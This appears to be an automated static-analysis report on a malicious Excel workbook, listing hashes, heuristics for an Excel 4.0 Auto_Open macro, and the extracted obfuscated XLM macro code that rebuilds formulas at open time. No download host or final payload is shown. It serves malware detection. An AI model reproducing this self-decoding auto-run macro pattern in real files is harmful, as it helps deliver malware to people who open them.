Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4389455148881ae0…

MALICIOUS

Office (OLE)

35.5 KB Created: 2020-11-25 10:28:42 Authoring application: Microsoft Excel First seen: 2021-02-09
MD5: 86eeb00ba69418a0ac44237e43767ffb SHA-1: 7065e83768567c6952152d7779a03600995f361b SHA-256: 4389455148881ae05c9b9d5a391249a4a6ecbc0d7d7a1ffa4b00763bfdc38e1f
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6487 bytes
SHA-256: cde665b20d1b650a7792bd03b508d25dad7c03163653e28dfd126220f59e281c
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  HcdrJOlf
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!I134 
' 0018     22 LABEL : Cell Value, String Constant - AZaqphq len=0 
' 0018     25 LABEL : Cell Value, String Constant - GzTvMNAUru len=0 
' 0018     22 LABEL : Cell Value, String Constant - hQQjnNl len=0 
' 0018     25 LABEL : Cell Value, String Constant - hWJLtASSXH len=0 
' 0018     20 LABEL : Cell Value, String Constant - IZMBd len=0 
' 0018     20 LABEL : Cell Value, String Constant - kdsne len=0 
' 0018     27 LABEL : Cell Value, String Constant - mhdNfyKEcnIP len=0 
' 0018     22 LABEL : Cell Value, String Constant - MQLGgUe len=0 
' 0018     22 LABEL : Cell Value, String Constant - oZjcBbZ len=0 
' 0018     22 LABEL : Cell Value, String Constant - pKOgToN len=0 
' 0018     20 LABEL : Cell Value, String Constant - PRiUy len=0 
' 0018     26 LABEL : Cell Value, String Constant - qDZgbdVyQGU len=0 
' 0018     22 LABEL : Cell Value, String Constant - QVdyFdU len=0 
' 0018     25 LABEL : Cell Value, String Constant - SPaiAIRWlg len=0 
' 0018     22 LABEL : Cell Value, String Constant - tPolKzc len=0 
' 0018     22 LABEL : Cell Value, String Constant - UpbkSsa len=0 
' 0018     20 LABEL : Cell Value, String Constant - URYSP len=0 
' 0018     25 LABEL : Cell Value, String Constant - VaIgAsBhmM len=0 
' 0018     22 LABEL : Cell Value, String Constant - XbEUVmd len=0 
' 0018     25 LABEL : Cell Value, String Constant - zIsyWKWBJN len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  HcdrJOlf,I50,"SET.NAME("hQQjnNl",VALUE("0"))",""
'  HcdrJOlf,I55,"SET.NAME("hWJLtASSXH",hQQjnNl)",""
'  HcdrJOlf,I59,"SET.NAME("UpbkSsa",hQQjnNl)",""
'  HcdrJOlf,I63,"SET.NAME("mhdNfyKEcnIP",COUNTA(AZaqphq))",""
'  HcdrJOlf,I68,"SET.NAME("VaIgAsBhmM",COUNTA(kdsne))",""
'  HcdrJOlf,I70,[],""
'  HcdrJOlf,I73,"SET.NAME("oZjcBbZ","")",""
'  HcdrJOlf,I76,"hWJLtASSXH",""
'  HcdrJOlf,I80,"SET.NAME("URYSP",HLOOKUP("*",AZaqphq,hWJLtASSXH,FALSE))",""
'  HcdrJOlf,I82,"zIsyWKWBJN",""
'  HcdrJOlf,I85,"SET.NAME("MQLGgUe",hQQjnNl)",""
'  HcdrJOlf,I89,[],""
'  HcdrJOlf,I94,"MQLGgUe",""
'  HcdrJOlf,I97,"SPaiAIRWlg",""
'  HcdrJOlf,I99,"IZMBd",""
'  HcdrJOlf,I101,"QVdyFdU",""
'  HcdrJOlf,I103,"SET.NAME("GzTvMNAUru",VALUE(HLOOKUP("*",kdsne,QVdyFdU,FALSE)))",""
'  HcdrJOlf,I107,"XbEUVmd",""
'  HcdrJOlf,I109,"oZjcBbZ",""
'  HcdrJOlf,I113,"UpbkSsa",""
'  HcdrJOlf,I115,NEXT(),""
'  HcdrJOlf,I119,"PRiUy",""
'  HcdrJOlf,I123,"SET.NAME("f",INT(T(FORMULA(T(oZjcBbZ)&"",""&T(PRiUy)))))",""
'  HcdrJOlf,I126,"qDZgbdVyQGU",""
'  HcdrJOlf,I129,NEXT(),""
'  HcdrJOlf,I132,RETURN(),""
'  HcdrJOlf,I159,"SET.NAME("tPolKzc",I50)",""
'  HcdrJOlf,I163,"AZaqphq",""
'  HcdrJOlf,I167,"SET.NAME("kdsne",R56C12)",""
'  HcdrJOlf,I169,"SET.NAME("qDZgbdVyQGU",177)",""
'  HcdrJOlf,I173,"SET.NAME("pKOgToN",9)",""
'  HcdrJOlf,I176,tPolKzc(),""
'  HcdrJOlf,I177,HALT(),""